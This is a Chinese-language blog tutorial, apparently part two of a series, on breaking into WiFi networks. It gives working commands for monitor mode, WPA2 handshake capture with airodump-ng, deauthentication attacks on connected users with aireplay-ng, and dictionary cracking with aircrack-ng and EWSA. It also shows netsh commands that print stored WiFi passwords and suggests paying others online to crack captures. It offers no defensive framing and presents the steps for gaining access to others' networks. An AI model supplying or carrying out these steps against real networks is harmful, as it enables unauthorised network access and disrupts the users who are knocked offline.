admin管理员组文章数量:1599441
上节课内容:盘点那些WIFI密码破解姿势(1)
前面讲了WIFI密码破解的两种姿势,这节讲airodump-ng、EWSA、等其他姿势获取WIFI密码。
00x1:airodump-ng:
接下来掏出我们最常见的神器:airodump-ng
还是老规矩,首先插上无线网卡
ifconfig -a 查看网卡(ifconfig 可以查看是否启用)
ifconfig wlan0 up 如果没开启则执行该命令开启无线网卡
airmon-ng start wlan0 开启监听模式,返回wlan0mon适配器
此时我们可以看到wifi名称,信道,加密方式,BSSID,信号强度等信息
PWR:信号强度
CH:信道
ENC:加密方式
最下方则是有用户连接的信息,破解时建议选取存在用户连接的wifi
我们再打开一个命令窗口,抓取握手包
airodump-ng -c 2 -w wpa2 wlan0mon
-c 信道
-w 保存的名称 适配器
为了加快我们抓取握手包的速度,利用aireplay-ng对wifi进行攻击
aireplay-ng -0 10 -a BSSID wlan0mon
-0 冲突模式 10 10次
-a 无线的bssid
此时需要多执行几次,因为一直再扫描,需要信道相同时,才会进行攻击
图中当到2信道的时候,攻击了10次,迫使用户重连,抓取握手包
#此时我们有三个窗口,一个扫描周围wifi,一个抓握手包,一个攻击
如图所示,右上角出现WPA handshake则表示抓到握手包
握手包目录:/home
文件后缀:cap
接下来就要看你字典的强度了,还有你的运气
利用aircrack-ng跑包:
aircrack-ng 握手包 -w 字典
成功跑到密码
00x2:windows下利用EWSA来跑包
直接把cap拖入进去
如果提示有效性,则表示包中存在密码,接下来我们就可以选择字典
建议把密码变换选项取消,默认里面是开启的,接下来点击开始破解
找到密码会自动提示,看你字典强度以及你的运气了,哈哈
如果你想让破解的速度更快,可以设置该选项
00x3:其他姿势
1)利用wifi万能钥匙
原理:当别人利用wifi万能钥匙连接后,密码则会共享
2)查看历史连接过的wifi密码
netsh wlan show profiles 查看连接过的wifi列表
netsh wlan show profiles "wifi名称" key=clear 查看密码
3)安卓的wifi分享功能
扫码后可得到wifi密码
到此,WIFI破解系列文章就结束了,讲的是一些常用的破解方法,淘宝也有很多代替跑包的,当你抓到包后,且没有过多的时间跑包,同时密码复杂,这时你就可以在网上找人帮忙跑包,这里就不打广告了,喜欢的给个赞叭。
版权声明:本文标题:盘点那些Wifi破解姿势(2) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1728320687a1153807.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论